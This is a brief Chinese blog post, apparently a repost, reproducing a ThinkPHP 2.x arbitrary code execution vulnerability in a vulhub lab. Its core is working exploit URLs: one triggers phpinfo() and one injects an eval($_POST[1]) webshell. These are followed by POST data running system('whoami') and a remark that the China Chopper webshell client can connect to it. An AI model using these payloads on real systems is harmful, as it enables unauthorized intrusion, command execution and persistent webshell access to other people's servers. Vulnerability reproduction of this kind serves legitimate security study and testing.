ThinkPHP 2.x 任意代码执行漏洞复现 - 润新知

ThinkPHP 2.x 任意代码执行漏洞复现

0x01 环境搭建

使用vulhub搭建漏洞环境

/vulhub-master/thinkphp/2-rce

http://192.168.255.130:8080/

0x02 漏洞复现

访问 http://192.168.255.130:8080/index.php?s=/index/index/xxx/${@phpinfo()}

访问 http://192.168.255.130:8080/index.php?s=a/b/c/${@print(eval($_POST[1]))} 可执行任意命令

POST数据： 1=system('whoami');

可使用菜刀连接

参考文章：https://www.freebuf.com/articles/people/223149.html
相关阅读:
HR人员基本信息、分配信息和地址信息SQL
iframe下面的session问题
 主流NOSQL数据库之MongoDB快速入门
 CookieThemeResolver
data binding&&conversionservice
二进制权限管理（转）
Spring MVC 对locale和theme的支持
 OpenSessionInViewFilter类作用
 Spring数据库访问之ORM（三）
Spring自定义属性编辑器PropertyEditorSupport + 使用CustomEditorConfigurer注册属性编辑器
原文地址：https://www.cnblogs.com/rnss/p/13413795.html

Copyright © 2020-2023 润新知